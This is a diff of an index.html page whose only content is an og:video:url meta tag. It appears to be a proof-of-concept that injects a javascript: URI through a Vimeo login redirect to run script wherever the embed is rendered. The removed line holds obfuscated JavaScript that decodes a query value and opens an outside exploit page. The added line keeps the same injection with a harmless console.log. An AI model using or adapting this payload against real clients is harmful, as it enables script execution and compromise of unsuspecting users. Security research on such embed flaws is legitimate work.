--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
     <meta property="og:image:width" content="1280">
     <meta property="og:image:height" content="720">
     <meta property="og:video:url"
-        content="https://player.vimeo.com/video/572419548/login/private?success=x&amp;url=javascript:(function(){var videoUrl = atob(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(5).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b)).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b))); window.open('https://ctf.s1r1us.ninja/discord/exp.html');})();">
+        content="https://player.vimeo.com/video/572419548/login/private?success=x&amp;url=javascript:(function(){console.log('Hello');})();">
     <meta property="og:video:type" content="text/html">
     <meta property="og:video:width" content="1280">
     <meta property="og:video:height" content="720">
